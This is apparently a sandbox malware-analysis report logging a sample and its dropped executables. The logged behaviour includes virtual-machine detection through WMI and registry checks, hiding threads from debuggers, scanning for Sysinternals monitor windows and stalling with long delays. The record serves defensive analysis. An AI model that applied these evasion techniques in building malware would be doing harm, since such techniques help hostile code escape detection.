Source: C:\Users\user\AppData\Local\Temp\4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\r.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\3.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\r.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\3.exe	System information queried: FirmwareTableInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	System information queried: FirmwareTableInformation			Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\AppData\Local\Temp\3.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\3.exe	Memory allocated: DE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Memory allocated: 3380000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Memory allocated: 31C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Memory allocated: 66A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Memory allocated: 76A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Memory allocated: 77D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Memory allocated: 87D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Memory allocated: 66A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Memory allocated: 76A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Memory allocated: 8A30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Memory allocated: 9A30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Memory allocated: AA30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Memory allocated: BA30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Memory allocated: BEF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Memory allocated: CEF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Memory allocated: 66A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Memory allocated: 76A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Memory allocated: 86A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Memory allocated: 96A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Memory allocated: 76A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Memory allocated: 86A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Memory allocated: 86A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Memory allocated: A6A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Memory allocated: 7440000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Memory allocated: 8440000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Memory allocated: 1B50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Memory allocated: 3A50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Memory allocated: 3870000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\r.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\3.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\3.exe	Window / User API: threadDelayed 9749	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Window / User API: threadDelayed 4942	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Window / User API: threadDelayed 4367	Jump to behavior

Source: C:\Users\user\Desktop\KR6CT3hIxT.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\winrar-x64-701.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\3.exe TID: 7504	Thread sleep time: -16602069666338586s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe TID: 7516	Thread sleep count: 100 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe TID: 7516	Thread sleep count: 9749 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe TID: 7996	Thread sleep time: -31359464925306218s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe TID: 7928	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe TID: 7952	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\r.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\AppData\Local\Temp\3.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Code function: 0_2_00007FF7E1DDB190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	0_2_00007FF7E1DDB190
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Code function: 0_2_00007FF7E1DC40BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	0_2_00007FF7E1DC40BC
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Code function: 0_2_00007FF7E1DEFCA0 FindFirstFileExA,	0_2_00007FF7E1DEFCA0
Source: C:\Users\user\AppData\Local\Temp\4.exe	Code function: 1_2_00B6BA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	1_2_00B6BA94
Source: C:\Users\user\AppData\Local\Temp\4.exe	Code function: 1_2_00B7D420 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	1_2_00B7D420
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Code function: 6_2_00EDBA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	6_2_00EDBA94
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Code function: 6_2_00EED420 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	6_2_00EED420

Source: C:\Users\user\Desktop\KR6CT3hIxT.exe

Code function: 0_2_00007FF7E1DE16A4 VirtualQuery,GetSystemInfo,

0_2_00007FF7E1DE16A4

Source: C:\Users\user\AppData\Local\Temp\3.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: 4.exe, 00000001.00000002.1703118557.00000000008D6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 3.exe, 00000002.00000002.4145534188.0000000000594000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\l
Source: r.exe, 00000007.00000002.2164011988.00000000017DA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4
Source: 3.exe, 00000002.00000002.4145534188.0000000000594000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllkflo

Source: C:\Users\user\AppData\Local\Temp\4.exe	API call chain: ExitProcess graph end node			graph_1-24674
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	API call chain: ExitProcess graph end node			graph_6-25753

Source: C:\Users\user\AppData\Local\Temp\3.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\r.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\AppData\Local\Temp\3.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Thread information set: HideFromDebugger			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\r.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\r.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\r.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\r.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\r.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\r.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\3.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process queried: DebugObjectHandle	Jump to behavior

Source: C:\Users\user\Desktop\KR6CT3hIxT.exe

Code function: 0_2_00007FF7E1DE3170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FF7E1DE3170

Source: C:\Users\user\AppData\Local\Temp\4.exe	Code function: 1_2_00B891B0 mov eax, dword ptr fs:[00000030h]		1_2_00B891B0
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Code function: 6_2_00EF91B0 mov eax, dword ptr fs:[00000030h]		6_2_00EF91B0

Source: C:\Users\user\Desktop\KR6CT3hIxT.exe

Code function: 0_2_00007FF7E1DF0D20 GetProcessHeap,

0_2_00007FF7E1DF0D20

Source: C:\Users\user\AppData\Local\Temp\3.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Code function: 0_2_00007FF7E1DE3170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF7E1DE3170
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Code function: 0_2_00007FF7E1DE2510 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF7E1DE2510
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Code function: 0_2_00007FF7E1DE3354 SetUnhandledExceptionFilter,	0_2_00007FF7E1DE3354
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Code function: 0_2_00007FF7E1DE76D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF7E1DE76D8
Source: C:\Users\user\AppData\Local\Temp\4.exe	Code function: 1_2_00B80A0A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00B80A0A
Source: C:\Users\user\AppData\Local\Temp\4.exe	Code function: 1_2_00B80B9D SetUnhandledExceptionFilter,	1_2_00B80B9D
Source: C:\Users\user\AppData\Local\Temp\4.exe	Code function: 1_2_00B80D8A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00B80D8A
Source: C:\Users\user\AppData\Local\Temp\4.exe	Code function: 1_2_00B84FEF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00B84FEF
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Code function: 6_2_00EF0A0A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_00EF0A0A
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Code function: 6_2_00EF0B9D SetUnhandledExceptionFilter,	6_2_00EF0B9D
